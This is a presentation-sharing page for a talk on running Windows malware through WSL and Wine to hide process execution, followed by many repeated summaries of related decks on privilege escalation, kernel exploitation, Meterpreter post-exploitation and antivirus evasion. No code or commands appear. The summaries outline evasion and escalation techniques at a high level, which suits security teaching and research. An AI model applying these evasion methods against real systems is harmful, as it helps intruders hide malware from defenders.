Executing Windows Malware through WSL (Bashware)
•Download as PPTX, PDF•
0 likes•669 views
A quick talk on executing Windows binaries using Wine in WSL. This allows for a sort of hidden process execution.
Report
Share
Report
Share
Recommended
An Introduction to Sysinternals
Introduction to 7 Sysinternals tools. Strings, Tcpview, Autoruns, Procmon, Procexp, Procdump and Psexec.
Windows Privilege Escalation
A collection of techniques that allow users to escalate privileges to local administrator and then to NT Authority\System. On a windows domain readers can use the described techniques to escalate to domain administrators.
Windows privilege escalation by Dhruv Shah
Different scenarios leading to privilege escalation
Design issues , implementation flaws, untimely system updates , permission issues etc
We ain’t talking about overflows here , just logics and techniques
Level Up! - Practical Windows Privilege Escalation
This document provides an overview of practical Windows privilege escalation techniques. It begins with introductions and disclaimers, then discusses Windows access control models and concepts like integrity levels. It proceeds to demonstrate potential escalation avenues like exploiting privileged access elsewhere on the network, extracting credentials from files, exploiting unpatched vulnerabilities, weak permissions on services/files, AlwaysInstallElevated policies, and DLL hijacking. The document emphasizes that privilege escalation is still possible even with UAC and provides tools and references for further information.
How fun of privilege escalation Red Pill2017
This document discusses various methods for escalating privileges on Windows and Linux systems. It begins by covering remote exploitation of vulnerable services running with high privileges. It then covers other methods such as exploiting weak passwords, insecure file/registry permissions, misconfigured services, and kernel exploits. Specific examples discussed include exploiting sudo permissions, cron jobs, service binary path manipulation, and the DirtyCOW Linux privilege escalation.
Privilege escalation from 1 to 0 Workshop
This document provides an overview of privilege escalation techniques. It begins with an introduction to the speaker and defines vertical privilege escalation as moving from a lower privilege user to a higher privilege user. It then covers common privilege escalation vectors for both Linux and Windows systems, such as exploiting kernel vulnerabilities, weak passwords, sudo misconfigurations, vulnerable services, and file permission issues. Specific techniques discussed include dirty cow, password cracking, escaping restricted shells, abusing cron jobs and SUID files. The document emphasizes that credentials are often found in insecure configurations, backup files, logs and other unprotected locations.
Linux privilege escalation 101
Linux privilege escalation guide using different techniques.
https://payatu.com/guide-linux-privilege-escalation/
Fundamentals of Linux Privilege Escalation
This document provides an introduction to techniques for Linux privilege escalation. It discusses exploiting vulnerabilities like kernel exploits, taking advantage of permissive file permissions like world-readable/writable files and SetUID programs, exploiting overly permissive sudo configurations, and issues that can arise from improper PATH variable configuration like executing a Trojan program. The document demonstrates finding and using exploits, identifying vulnerable configurations, and how an attacker could leverage each technique to escalate privileges on a target Linux system. It also provides recommendations for how to protect against these methods through patching, auditing permissions and configurations, and restricting what programs can be executed with elevated privileges.
Recommended
An Introduction to Sysinternals
Introduction to 7 Sysinternals tools. Strings, Tcpview, Autoruns, Procmon, Procexp, Procdump and Psexec.
Windows Privilege Escalation
A collection of techniques that allow users to escalate privileges to local administrator and then to NT Authority\System. On a windows domain readers can use the described techniques to escalate to domain administrators.
Windows privilege escalation by Dhruv Shah
Different scenarios leading to privilege escalation
Design issues , implementation flaws, untimely system updates , permission issues etc
We ain’t talking about overflows here , just logics and techniques
Level Up! - Practical Windows Privilege Escalation
This document provides an overview of practical Windows privilege escalation techniques. It begins with introductions and disclaimers, then discusses Windows access control models and concepts like integrity levels. It proceeds to demonstrate potential escalation avenues like exploiting privileged access elsewhere on the network, extracting credentials from files, exploiting unpatched vulnerabilities, weak permissions on services/files, AlwaysInstallElevated policies, and DLL hijacking. The document emphasizes that privilege escalation is still possible even with UAC and provides tools and references for further information.
How fun of privilege escalation Red Pill2017
This document discusses various methods for escalating privileges on Windows and Linux systems. It begins by covering remote exploitation of vulnerable services running with high privileges. It then covers other methods such as exploiting weak passwords, insecure file/registry permissions, misconfigured services, and kernel exploits. Specific examples discussed include exploiting sudo permissions, cron jobs, service binary path manipulation, and the DirtyCOW Linux privilege escalation.
Privilege escalation from 1 to 0 Workshop
This document provides an overview of privilege escalation techniques. It begins with an introduction to the speaker and defines vertical privilege escalation as moving from a lower privilege user to a higher privilege user. It then covers common privilege escalation vectors for both Linux and Windows systems, such as exploiting kernel vulnerabilities, weak passwords, sudo misconfigurations, vulnerable services, and file permission issues. Specific techniques discussed include dirty cow, password cracking, escaping restricted shells, abusing cron jobs and SUID files. The document emphasizes that credentials are often found in insecure configurations, backup files, logs and other unprotected locations.
Linux privilege escalation 101
Linux privilege escalation guide using different techniques.
https://payatu.com/guide-linux-privilege-escalation/
Fundamentals of Linux Privilege Escalation
This document provides an introduction to techniques for Linux privilege escalation. It discusses exploiting vulnerabilities like kernel exploits, taking advantage of permissive file permissions like world-readable/writable files and SetUID programs, exploiting overly permissive sudo configurations, and issues that can arise from improper PATH variable configuration like executing a Trojan program. The document demonstrates finding and using exploits, identifying vulnerable configurations, and how an attacker could leverage each technique to escalate privileges on a target Linux system. It also provides recommendations for how to protect against these methods through patching, auditing permissions and configurations, and restricting what programs can be executed with elevated privileges.
Linux advanced privilege escalation
Author: Jameel Nabbo
Company: UITSEC
This guide contain a practical hands on Linux privilege escalation techniques and methods. based on a real penetration testing experience.
From zero to SYSTEM on full disk encrypted windows system
This document discusses exploiting trust relationships and group policies to escalate privileges on a Windows system with full disk encryption. It describes exploiting MS15-122 and MS16-014 to poison the credential cache and authenticate to a rogue domain controller. Group policies can then be used to run applications with SYSTEM privileges and extract credentials or encryption keys before Windows fully loads. While Windows 10 provides some improvements, similar vulnerabilities were still present until MS16-072 was released after several months.
Using symfony to save time, effort and sanity
Symfony is an open source PHP framework that aims to save developers time, effort, and sanity. It provides a suite of tools including routing, forms, caching, security features, and documentation. Symfony is flexible and configurable, allowing developers to customize it for their needs. It also has an active community for support.
J+s
This document discusses some of the advantages and disadvantages of introducing Linux into systems that previously used Windows. It outlines higher stability, lower costs, and improved security as potential benefits of Linux. However, it also notes learning curves for users accustomed to Windows and potential compatibility issues. The document provides guidance on setting up a Linux development environment, including compilers, debuggers, version control through Subversion, and recommendations for hosting Subversion repositories. It encourages taking a cautious, business-driven approach to any transition.
WIndows Kernel-Land exploitation
This document discusses exploiting vulnerabilities in the Windows kernel through a technique called use-after-free. It begins with an introduction to the speaker and an overview of kernel exploitation and the use-after-free technique. It then demonstrates a proof-of-concept use-after-free exploit against a Windows kernel driver using steps like allocating and freeing an object, spraying memory to create holes, and overwriting a pointer to execute shellcode. The document concludes by thanking the audience and inviting questions.
Introduction to Linux Privilege Escalation Methods
So you’ve managed to get a foothold into the web server — now what? Privilege escalation can be an intimidating process for those unfamiliar with Linux systems or advanced penetration testing techniques. Servers are often cluttered with utilities, backups, and files; how do you find your way through to a root shell? Where are the first places an attacker might look for exploitable vulnerabilities? This slide deck will help you learn about common privilege escalation paths on Linux systems, including sticky bits, shell escapes, wildcard injections, and how to identify vulnerable services. Furthermore, it will illustrate several techniques for those looking to improve their security skills, with time for discussion afterward.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
The document discusses exploiting TrueType font (TTF) vulnerabilities to achieve kernel code execution on Windows systems. It begins by describing the discovery of exploitable bugs in a TTF fuzzer. Despite mitigations like KASLR, NX, SMAP, and CFG, the researchers were able to bypass these protections through techniques like controlled overflows, abusing plain kernel structures, and function-driven attacks. They show how to leverage wild overflows, control kernel memory layout, and hijack control flow to achieve arbitrary code execution. The document emphasizes that OS design weaknesses allow bypassing modern defenses through clever bug chaining and memory manipulation.
Device drivers Introduction
Linux device drivers (LDDs) are low-level software that handle hardware controllers and hide their peculiarities from users. They present a uniform view of devices. Each physical device like keyboards or disks has a hardware controller that is managed by a device driver. Device drivers control and status registers to initialize and diagnose devices. The code for managing hardware controllers is kept in the Linux kernel rather than applications. Device drivers provide the layer between applications and hardware devices.
Hosting Open Source Projects at the OSUOSL
The document summarizes the Open Source Software Lab (OSUOSL) at Oregon State University, which provides hosting for open source projects. It discusses the history and growth of OSUOSL over the past 4 years, from hosting around 60 projects on 10 racks to now hosting over 300 machines and 130 VMs for many well-known open source projects across 22 racks. It also outlines the services, staffing, funding sources, tools, and future plans of OSUOSL.
Day 2 Dns Cert 4c Malicious Use
- The document describes how DNS can be used maliciously for botnet command and control or amplification attacks, using a demonstration of a DNS bot.
- It provides the case study of the Conficker worm which used randomly generated domain names for instructions. A working group registered domains to prevent its activity until it switched to P2P.
- The demonstration shows a rogue DNS server instructing the bot to execute commands and post results via DNS queries, which can be seen in Wireshark.
- Mitigation strategies include domain blackholes, strengthening registration validation, detection mechanisms, and takedown policies developed with other organizations.
PowerShell 2.0 remoting
This document discusses PowerShell remoting, including the basics of interactive and implicit remoting, on-disk remote sessions, multi-hop remoting, and session configurations. It provides an overview of how PowerShell remoting works and was built on Windows Remote Management (WinRM) to enable universal code execution and remote management capabilities. Examples are given of how to enable remoting, run remote commands, create remote sessions, and customize the remoting experience through session configurations. Learning resources on PowerShell remoting are also listed.
Course 101: Lecture 4: A Tour in RTOS Land
This lecture provides an overview of the popular RTOS's in the Market along with their main features and common applications
Check the other Lectures and courses in
http://Linux4EnbeddedSystems.com
or Follow our Facebook Group at
- Facebook: @LinuxforEmbeddedSystems
Lecturer Profile:
- https://www.linkedin.com/in/ahmedelarabawy
Introduction to operating system, system calls and interrupts
1.Topics to focus for OS interviews
2. Introduction to operating system with architecture diagram
3. Operating system vs Kernel
4. Examples of operating system and Kernel
5. System calls, context switch and interrupts
Buffer overflows
Buffer overflows are a major vulnerability that allow arbitrary code to be executed remotely by exploiting flaws in how software handles memory. They occur when a program lacks sufficient bounds checking on user input written to a buffer, allowing an attacker to overwrite adjacent memory and hijack the program flow. While techniques like data execution prevention and stack canaries provide some protection, buffer overflows remain a threat due to weaknesses in software testing and development practices. Careful coding through measures like code reviews is the best way to prevent buffer overflows.
Gnubs-pres-foss-cdac-sem
The document discusses the GNU Build System, which helps simplify the development and building of portable software distributed as source code. It provides an overview of the key components of the GNU Build System - autoconf, automake, and libtool - and how they are used to generate configuration scripts and Makefile templates from initial files. The document also outlines the typical process of applying the GNU Build System tools to create software packages that can be easily built, installed, and distributed.
Embedded Systems: Lecture 5: A Tour in RTOS Land
This lecture provides an overview of the popular RTOS's in the Market along with their main features and common applications
Post Exploitation Using Meterpreter
The document discusses using Meterpreter for post exploitation activities after gaining access to a target system. Meterpreter provides an advanced multi-function payload that injects itself into running processes to provide core and advanced command functionality through extensions in a more stealthy way than normal payloads. The document outlines how Meterpreter works and can be used for activities like enumeration, privilege escalation, information harvesting, and pivoting across a network during post exploitation.
Docker, Linux Containers (LXC), and security
Linux containers provide isolation between applications using namespaces and cgroups. While containers appear similar to VMs, they do not fully isolate applications and some security risks remain. To improve container security, Docker recommends: 1) not running containers as root, 2) dropping capabilities like CAP_SYS_ADMIN, 3) enabling user namespaces, and 4) using security modules like SELinux. However, containers cannot fully isolate applications that need full hardware or kernel access, so virtual machines may be needed in some cases.
Security research over Windows #defcon china
Past several years Microsoft Windows undergo lot of fundamental security changes. Where one can argue still imperfect and bound to tons of legacy issues, on the other hand those changes made important shifts in attacker perspective. From tightened sandboxing, restricting attack surface, introducing mitigations, applying virtualization up to stronger focus even on win32k. In our talk we will go trough those changes, how it affects us and how we tackle them from choosing targets, finding bugs up to exploitation primitives we are using. While also empathize that windows research is not only about sandbox, and there are many more interesting target to look for.
How *NOT* to firmware
My slides from the March 9th Boston security meetup about the netgear nighthawk vulnerability that was disclosed back in December of 2016.
Linux Server Security and Hardering
This document discusses various topics relating to Linux server security and hardening. It begins with an introduction of the author and their background/experience. It then addresses common myths about Linux security and provides statistics on Linux kernel vulnerabilities over time. The document outlines several historical exploits and vulnerabilities like Dirty Cow, Heartbleed, and Shellshock. It provides recommendations for securing aspects like disk partitions, password policies, SSH, SELinux, PHP, Apache, intrusion detection/prevention tools, and auditing/scanning tools. Live demonstrations are given for OpenSCAP and Lynis. Overall the document serves as a guide to properly secure Linux servers.
What Is A Good Operating System For Malware Analysis.pdf
When it comes to conducting malware analysis, there are several operating systems (OS) and tools that security researchers and analysts commonly use.
the choice of the operating system and tools for malware analysis depends on your specific needs, skill set, and the type of malware you're dealing with. It's important to emphasize that when conducting malware analysis, you should always work in a controlled and isolated environment to prevent the malware from spreading or causing harm to your systems. Additionally, keep in mind that ethical and legal considerations are important in this field, so ensure you have the necessary permissions and comply with relevant laws and regulations when analyzing malware.
Learn more:
https://www.bytec0de.com/malware-analysis-course-training-certification/
More Related Content
What's hot
Linux advanced privilege escalation
Author: Jameel Nabbo
Company: UITSEC
This guide contain a practical hands on Linux privilege escalation techniques and methods. based on a real penetration testing experience.
From zero to SYSTEM on full disk encrypted windows system
This document discusses exploiting trust relationships and group policies to escalate privileges on a Windows system with full disk encryption. It describes exploiting MS15-122 and MS16-014 to poison the credential cache and authenticate to a rogue domain controller. Group policies can then be used to run applications with SYSTEM privileges and extract credentials or encryption keys before Windows fully loads. While Windows 10 provides some improvements, similar vulnerabilities were still present until MS16-072 was released after several months.
Using symfony to save time, effort and sanity
Symfony is an open source PHP framework that aims to save developers time, effort, and sanity. It provides a suite of tools including routing, forms, caching, security features, and documentation. Symfony is flexible and configurable, allowing developers to customize it for their needs. It also has an active community for support.
J+s
This document discusses some of the advantages and disadvantages of introducing Linux into systems that previously used Windows. It outlines higher stability, lower costs, and improved security as potential benefits of Linux. However, it also notes learning curves for users accustomed to Windows and potential compatibility issues. The document provides guidance on setting up a Linux development environment, including compilers, debuggers, version control through Subversion, and recommendations for hosting Subversion repositories. It encourages taking a cautious, business-driven approach to any transition.
WIndows Kernel-Land exploitation
This document discusses exploiting vulnerabilities in the Windows kernel through a technique called use-after-free. It begins with an introduction to the speaker and an overview of kernel exploitation and the use-after-free technique. It then demonstrates a proof-of-concept use-after-free exploit against a Windows kernel driver using steps like allocating and freeing an object, spraying memory to create holes, and overwriting a pointer to execute shellcode. The document concludes by thanking the audience and inviting questions.
Introduction to Linux Privilege Escalation Methods
So you’ve managed to get a foothold into the web server — now what? Privilege escalation can be an intimidating process for those unfamiliar with Linux systems or advanced penetration testing techniques. Servers are often cluttered with utilities, backups, and files; how do you find your way through to a root shell? Where are the first places an attacker might look for exploitable vulnerabilities? This slide deck will help you learn about common privilege escalation paths on Linux systems, including sticky bits, shell escapes, wildcard injections, and how to identify vulnerable services. Furthermore, it will illustrate several techniques for those looking to improve their security skills, with time for discussion afterward.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
The document discusses exploiting TrueType font (TTF) vulnerabilities to achieve kernel code execution on Windows systems. It begins by describing the discovery of exploitable bugs in a TTF fuzzer. Despite mitigations like KASLR, NX, SMAP, and CFG, the researchers were able to bypass these protections through techniques like controlled overflows, abusing plain kernel structures, and function-driven attacks. They show how to leverage wild overflows, control kernel memory layout, and hijack control flow to achieve arbitrary code execution. The document emphasizes that OS design weaknesses allow bypassing modern defenses through clever bug chaining and memory manipulation.
Device drivers Introduction
Linux device drivers (LDDs) are low-level software that handle hardware controllers and hide their peculiarities from users. They present a uniform view of devices. Each physical device like keyboards or disks has a hardware controller that is managed by a device driver. Device drivers control and status registers to initialize and diagnose devices. The code for managing hardware controllers is kept in the Linux kernel rather than applications. Device drivers provide the layer between applications and hardware devices.
Hosting Open Source Projects at the OSUOSL
The document summarizes the Open Source Software Lab (OSUOSL) at Oregon State University, which provides hosting for open source projects. It discusses the history and growth of OSUOSL over the past 4 years, from hosting around 60 projects on 10 racks to now hosting over 300 machines and 130 VMs for many well-known open source projects across 22 racks. It also outlines the services, staffing, funding sources, tools, and future plans of OSUOSL.
Day 2 Dns Cert 4c Malicious Use
- The document describes how DNS can be used maliciously for botnet command and control or amplification attacks, using a demonstration of a DNS bot.
- It provides the case study of the Conficker worm which used randomly generated domain names for instructions. A working group registered domains to prevent its activity until it switched to P2P.
- The demonstration shows a rogue DNS server instructing the bot to execute commands and post results via DNS queries, which can be seen in Wireshark.
- Mitigation strategies include domain blackholes, strengthening registration validation, detection mechanisms, and takedown policies developed with other organizations.
PowerShell 2.0 remoting
This document discusses PowerShell remoting, including the basics of interactive and implicit remoting, on-disk remote sessions, multi-hop remoting, and session configurations. It provides an overview of how PowerShell remoting works and was built on Windows Remote Management (WinRM) to enable universal code execution and remote management capabilities. Examples are given of how to enable remoting, run remote commands, create remote sessions, and customize the remoting experience through session configurations. Learning resources on PowerShell remoting are also listed.
Course 101: Lecture 4: A Tour in RTOS Land
This lecture provides an overview of the popular RTOS's in the Market along with their main features and common applications
Check the other Lectures and courses in
http://Linux4EnbeddedSystems.com
or Follow our Facebook Group at
- Facebook: @LinuxforEmbeddedSystems
Lecturer Profile:
- https://www.linkedin.com/in/ahmedelarabawy
Introduction to operating system, system calls and interrupts
1.Topics to focus for OS interviews
2. Introduction to operating system with architecture diagram
3. Operating system vs Kernel
4. Examples of operating system and Kernel
5. System calls, context switch and interrupts
Buffer overflows
Buffer overflows are a major vulnerability that allow arbitrary code to be executed remotely by exploiting flaws in how software handles memory. They occur when a program lacks sufficient bounds checking on user input written to a buffer, allowing an attacker to overwrite adjacent memory and hijack the program flow. While techniques like data execution prevention and stack canaries provide some protection, buffer overflows remain a threat due to weaknesses in software testing and development practices. Careful coding through measures like code reviews is the best way to prevent buffer overflows.
Gnubs-pres-foss-cdac-sem
The document discusses the GNU Build System, which helps simplify the development and building of portable software distributed as source code. It provides an overview of the key components of the GNU Build System - autoconf, automake, and libtool - and how they are used to generate configuration scripts and Makefile templates from initial files. The document also outlines the typical process of applying the GNU Build System tools to create software packages that can be easily built, installed, and distributed.
Embedded Systems: Lecture 5: A Tour in RTOS Land
This lecture provides an overview of the popular RTOS's in the Market along with their main features and common applications
Post Exploitation Using Meterpreter
The document discusses using Meterpreter for post exploitation activities after gaining access to a target system. Meterpreter provides an advanced multi-function payload that injects itself into running processes to provide core and advanced command functionality through extensions in a more stealthy way than normal payloads. The document outlines how Meterpreter works and can be used for activities like enumeration, privilege escalation, information harvesting, and pivoting across a network during post exploitation.
Docker, Linux Containers (LXC), and security
Linux containers provide isolation between applications using namespaces and cgroups. While containers appear similar to VMs, they do not fully isolate applications and some security risks remain. To improve container security, Docker recommends: 1) not running containers as root, 2) dropping capabilities like CAP_SYS_ADMIN, 3) enabling user namespaces, and 4) using security modules like SELinux. However, containers cannot fully isolate applications that need full hardware or kernel access, so virtual machines may be needed in some cases.
Security research over Windows #defcon china
Past several years Microsoft Windows undergo lot of fundamental security changes. Where one can argue still imperfect and bound to tons of legacy issues, on the other hand those changes made important shifts in attacker perspective. From tightened sandboxing, restricting attack surface, introducing mitigations, applying virtualization up to stronger focus even on win32k. In our talk we will go trough those changes, how it affects us and how we tackle them from choosing targets, finding bugs up to exploitation primitives we are using. While also empathize that windows research is not only about sandbox, and there are many more interesting target to look for.
How *NOT* to firmware
My slides from the March 9th Boston security meetup about the netgear nighthawk vulnerability that was disclosed back in December of 2016.
What's hot (20)
From zero to SYSTEM on full disk encrypted windows system
From zero to SYSTEM on full disk encrypted windows system
Introduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation Methods
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes
Introduction to operating system, system calls and interrupts
Introduction to operating system, system calls and interrupts
Similar to Executing Windows Malware through WSL (Bashware)
Linux Server Security and Hardering
This document discusses various topics relating to Linux server security and hardening. It begins with an introduction of the author and their background/experience. It then addresses common myths about Linux security and provides statistics on Linux kernel vulnerabilities over time. The document outlines several historical exploits and vulnerabilities like Dirty Cow, Heartbleed, and Shellshock. It provides recommendations for securing aspects like disk partitions, password policies, SSH, SELinux, PHP, Apache, intrusion detection/prevention tools, and auditing/scanning tools. Live demonstrations are given for OpenSCAP and Lynis. Overall the document serves as a guide to properly secure Linux servers.
What Is A Good Operating System For Malware Analysis.pdf
When it comes to conducting malware analysis, there are several operating systems (OS) and tools that security researchers and analysts commonly use.
the choice of the operating system and tools for malware analysis depends on your specific needs, skill set, and the type of malware you're dealing with. It's important to emphasize that when conducting malware analysis, you should always work in a controlled and isolated environment to prevent the malware from spreading or causing harm to your systems. Additionally, keep in mind that ethical and legal considerations are important in this field, so ensure you have the necessary permissions and comply with relevant laws and regulations when analyzing malware.
Learn more:
https://www.bytec0de.com/malware-analysis-course-training-certification/
Kali presentation
kali operating system LINUX UNIX MAC Window presentation ubanto MAC KAli features compare of kali and unix in hindi easy present ppt slideshare tolls hacking penetration ethical hacking KALI top ten feature best hacking tool
VCS, Containers & Low-code
A presentation on the concepts of Version Control Systems, Containerization and Low-code development as it relates to Software Development.
Infosecurity.be 2019: What are relevant open source security tools you should...
Quick talk by Marc Vael and yours truly about the treasure trove of open source security tools that are available to us all.
Linux for embedded_systems
Linux is a widely used open source operating system kernel that can also refer to full operating system distributions. It is commonly used in embedded systems due to its portability, modularity, and ability to run on hardware with limited resources. Device drivers can be dynamically loaded and unloaded from the Linux kernel as modules, allowing new functionality to be added without rebooting the system. This makes Linux well-suited for embedded device development.
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
The document provides an overview of how anti-virus software works and techniques used to bypass antivirus detection. It discusses how antiviruses use signature-based, heuristic-based, behavioral, and sandboxing techniques to detect malware. It also explains common techniques used to evade detection like packers, splitters, code obfuscation, and injection. The document concludes that while antivirus has improved, virus creators continually develop new methods to bypass protections and that additional security measures are still needed.
Linux
The document provides information about Linux operating system. It discusses the history of Linux, how it was developed by Linus Torvalds as a free and open source alternative to Unix. It describes the key components of Linux like the kernel, types of kernels (microkernel, monolithic, hybrid), features of Linux like portability, open source nature, security etc. It also discusses popular Linux distributions like Ubuntu, Red Hat, Debian, Fedora and SUSE. Finally, it mentions some methods of installing Linux like booting from a USB or burning a live CD.
Inspec: Turn your compliance, security, and other policy requirements into au...
This document discusses InSpec, an open-source testing framework for infrastructure and compliance. It can be used to test security configurations and compliance across operating systems, platforms, and cloud providers. InSpec allows users to write tests in a human-readable language and execute them locally or remotely. Tests can be packaged into reusable profiles that ensure configurations meet security and compliance requirements throughout the development lifecycle.
InSpec - June 2018 at Open28.be
This document discusses InSpec, an open-source testing framework for infrastructure and compliance. It can be used to test configurations and ensure security best practices are followed. InSpec uses human-readable tests and comes with built-in resources to test common infrastructure components. It can test locally or remotely on Linux, Windows, and cloud platforms. Profiles allow packaging tests for reuse across environments. InSpec integrates with DevOps tools like Chef and Test Kitchen to enable compliance testing in development workflows.
1 artem mygaiev - testing open-source software in embedded devices
This document discusses testing open source software in embedded devices. It notes that the border between embedded and non-embedded systems is disappearing as embedded systems become more powerful with Linux-based software and open source components. The document outlines prerequisites for testing including having testing be fully automated, integrated with continuous integration (CI) systems, and testing the full system from operating system to business logic on distributed device under test (DUT) systems. It presents a reference architecture for testing with a CI server, build server, test master, test slaves, and file server running test jobs and scenarios on DUTs. The document also introduces the Linaro Automation and Validation Architecture (LAVA) for deploying operating systems on physical and virtual hardware for
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
How to secure microservices running in containers? Strategies for Docker, Kubernetes, Openshift, RancherOS, DC/OS Mesos.
Privileges, resources and visibility constrains with capabilities, cgroups and namespaces. Image vulnerability scanning and behaviour security monitoring with Sysdig Falco.
Building next gen malware behavioural analysis environment
This document discusses building an automated malware behavioral analysis environment. It covers types of malware analysis, taxonomy of analysis platforms, analysis phases and checks, and evaluation strategies. Static and dynamic automated analysis are described as well as their pros, cons, and limitations. The analysis phases of submission, analysis, and reporting are outlined. Key challenges like modularity, fingerprinting, stalling, social engineering, and decoys are examined. Examples of analysis platforms and tools are provided.
Version Control and Continuous Integration
This is Greg Montaño's slides on "Version Control and Continuous Integration", which was presented at the Cebu StackOverflow Meetup on 26 May 2012.
Vulnex app secusa2013
This document outlines a presentation given by Simón Roses Femerling on software security verification tools. It discusses BinSecSweeper, an open source tool created by VulnEx to scan binaries and check that security best practices were followed in development. The presentation covers using BinSecSweeper to verify in-house software, assess a company's software security posture, and compare the security of popular browsers. Examples of plugin checks and reports generated by BinSecSweeper are also provided.
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
Penetration testing of current embedded devices is quite complex as we have to deal with different architectures, optimized operating systems and special protocols. EMBA is an open-source firmware analyzer with the goal to simplify, optimize and automate the complex task of firmware security analysis.
Project page: https://github.com/e-m-b-a/emba
Conference page: https://forum.defcon.org/node/242109
WTF my container just spawned a shell!
This document discusses various techniques for securing containers and monitoring container activity, including:
- Static and dynamic scanning of container images to detect vulnerabilities
- Using seccomp, seccomp-bpf, SELinux, and Auditd for sandboxing and monitoring system calls
- Sysdig Falco for behavioral monitoring and detecting anomalies based on rules
- Examples of rules to detect things like shells running in containers or overwriting system binaries
The document provides an overview of these various security tools and techniques for containers, with examples of how they can be used to monitor and restrict container behavior to detect security issues or policy violations.
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
Recent And Future Trends In Os
Linux Kernel Module Programming, Embedded Operating Systems: Characteristics of Embedded Systems, Embedded Linux, and Application specific OS. Basic services of NACH Operating System.
Introduction to Service Oriented Operating System (SOOS), Introduction to Ubuntu EDGE OS.
Designed By : Tushar B Kute (http://tusharkute.com)
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
This document discusses privilege escalation techniques on Linux systems. It begins by explaining that privilege escalation involves gaining root access on a machine where you initially only have non-root access. It then outlines several common methods for escalating privileges including exploiting binaries, using valid credentials, sudo misconfigurations, cron jobs, SUID executables, and breaking out of containers. The document provides links to additional resources and recommends first reconning the system to determine which escalation methods may apply.
Overview on Open Source Technology.pptx
Getting started with open source technology linux , linux distros , comparison between open source and commercial software and linux uses
Similar to Executing Windows Malware through WSL (Bashware) (20)
What Is A Good Operating System For Malware Analysis.pdf
What Is A Good Operating System For Malware Analysis.pdf
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Inspec: Turn your compliance, security, and other policy requirements into au...
Inspec: Turn your compliance, security, and other policy requirements into au...
1 artem mygaiev - testing open-source software in embedded devices
1 artem mygaiev - testing open-source software in embedded devices
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Building next gen malware behavioural analysis environment
Building next gen malware behavioural analysis environment
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
Unit 6 Operating System TEIT Savitribai Phule Pune University by Tushar B Kute
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
Recently uploaded
The Rising Future of CPaaS in the Middle East 2024
Explore "The Rising Future of CPaaS in the Middle East in 2024" with this comprehensive PPT presentation. Discover how Communication Platforms as a Service (CPaaS) is transforming communication across various sectors in the Middle East.
Building API data products on top of your real-time data infrastructure
This talk and live demonstration will examine how Confluent and Gravitee.io integrate to unlock value from streaming data through API products.
You will learn how data owners and API providers can document, secure data products on top of Confluent brokers, including schema validation, topic routing and message filtering.
You will also see how data and API consumers can discover and subscribe to products in a developer portal, as well as how they can integrate with Confluent topics through protocols like REST, Websockets, Server-sent Events and Webhooks.
Whether you want to monetize your real-time data, enable new integrations with partners, or provide self-service access to topics through various protocols, this webinar is for you!
Strengthening Web Development with CommandBox 6: Seamless Transition and Scal...
Strengthening Web Development with CommandBox 6: Seamless Transition and Scal...Ortus Solutions, Corp
Join us for a session exploring CommandBox 6’s smooth website transition and efficient deployment. CommandBox revolutionizes web development, simplifying tasks across Linux, Windows, and Mac platforms. Gain insights and practical tips to enhance your development workflow.
Come join us for an enlightening session where we delve into the smooth transition of current websites and the efficient deployment of new ones using CommandBox 6. CommandBox has revolutionized web development, consistently introducing user-friendly enhancements that catalyze progress in the field. During this presentation, we’ll explore CommandBox’s rich history and showcase its unmatched capabilities within the realm of ColdFusion, covering both major variations.
The journey of CommandBox has been one of continuous innovation, constantly pushing boundaries to simplify and optimize development processes. Regardless of whether you’re working on Linux, Windows, or Mac platforms, CommandBox empowers developers to streamline tasks with unparalleled ease.
In our session, we’ll illustrate the simple process of transitioning existing websites to CommandBox 6, highlighting its intuitive features and seamless integration. Moreover, we’ll unveil the potential for effortlessly deploying multiple websites, demonstrating CommandBox’s versatility and adaptability.
Join us on this journey through the evolution of web development, guided by the transformative power of CommandBox 6. Gain invaluable insights, practical tips, and firsthand experiences that will enhance your development workflow and embolden your projects.Operational ease MuleSoft and Salesforce Service Cloud Solution v1.0.pptx
Operational ease MuleSoft and Salesforce Service Cloud Solution v1.0
Baha Majid WCA4Z IBM Z Customer Council Boston June 2024.pdf
IBM watsonx Code Assistant for Z, our latest Generative AI-assisted mainframe application modernization solution. Mainframe (IBM Z) application modernization is a topic that every mainframe client is addressing to various degrees today, driven largely from digital transformation. With generative AI comes the opportunity to reimagine the mainframe application modernization experience. Infusing generative AI will enable speed and trust, help de-risk, and lower total costs associated with heavy-lifting application modernization initiatives. This document provides an overview of the IBM watsonx Code Assistant for Z which uses the power of generative AI to make it easier for developers to selectively modernize COBOL business services while maintaining mainframe qualities of service.
Enhanced Screen Flows UI/UX using SLDS with Tom Kitt
Join us for an engaging session led by Flow Champion, Tom Kitt. This session will dive into a technique of enhancing the user interfaces and user experiences within Screen Flows using the Salesforce Lightning Design System (SLDS). This technique uses Native functionality, with No Apex Code, No Custom Components and No Managed Packages required.
Secure-by-Design Using Hardware and Software Protection for FDA Compliance
This webinar explores the “secure-by-design” approach to medical device software development. During this important session, we will outline which security measures should be considered for compliance, identify technical solutions available on various hardware platforms, summarize hardware protection methods you should consider when building in security and review security software such as Trusted Execution Environments for secure storage of keys and data, and Intrusion Detection Protection Systems to monitor for threats.
The Role of DevOps in Digital Transformation.pdf
